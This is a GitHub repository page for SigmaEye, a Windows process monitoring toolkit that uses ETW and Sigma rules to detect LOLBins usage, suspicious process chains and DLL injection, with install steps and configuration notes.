Skip to content

SigmaEye is a Windows process monitoring toolkit that integrates ETW and user-level monitoring with Sigma rules. It detects suspicious process behavior, LOLBins usage, and potential threats in real-time. Features include dual monitoring, DLL injection tracking, and customizable detection rules. Requires admin privileges for ETW monitoring.

Notifications You must be signed in to change notification settings

petstuk/SigmaEye

Folders and files

NameName
Last commit message
Last commit date

Latest commit

3c4f9e1 · Feb 22, 2025

History

7 Commits
Feb 22, 2025
Feb 22, 2025
Feb 22, 2025
Feb 22, 2025
Feb 22, 2025
Feb 22, 2025
Feb 22, 2025
Feb 22, 2025

Repository files navigation

SigmaEye

A Windows process monitoring toolkit that combines ETW (Event Tracing for Windows) and user-level monitoring capabilities with Sigma rules integration. SigmaEye provides real-time detection of suspicious process behavior, LOLBins usage, and potential threats.

Features

  • Dual Monitoring Capabilities

    • ETW Monitor (Admin required) for system-level visibility
    • User-level Process Monitor for non-privileged monitoring
  • Integrated Detection

    • Sigma rules integration
    • LOLBins (Living off the Land Binaries) detection
    • Suspicious process chain analysis
    • DLL injection monitoring

Requirements

  • Python 3.6+
  • Windows Operating System
  • Administrator privileges (for ETW monitoring)

Python Dependencies

pip install pywin32 wmi pyyaml psutil

Installation

  1. Clone the repository:
git clone https://github.com/petstuk/SigmaEye
cd SigmaEye
  1. Install required packages:
pip install -r requirements.txt
  1. Clone Sigma rules (An older version of these already exist in this repository - to update this, delete the existing sigma folder and clone up to date rules using the below command):
git clone https://github.com/SigmaHQ/sigma.git
  1. Run either monitor:
# For ETW Monitor (as admin):
python3 etw_monitor.py

# For User Process Monitor:
python3 user_process_monitor.py

Configuration

The config.yaml file allows customization of:

  • LOLBins detection rules
  • Suspicious process patterns
  • DLL monitoring paths
  • Alert thresholds

Logging

  • ETW Monitor logs to etw_monitor.log
  • User Process Monitor creates logs in logs/ directory
  • Detailed JSON output for all alerts
  • Process relationship tracking

Contributing

Contributions welcome! Feel free to submit issues or pull requests.

License

MIT License

About

SigmaEye is a Windows process monitoring toolkit that integrates ETW and user-level monitoring with Sigma rules. It detects suspicious process behavior, LOLBins usage, and potential threats in real-time. Features include dual monitoring, DLL injection tracking, and customizable detection rules. Requires admin privileges for ETW monitoring.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages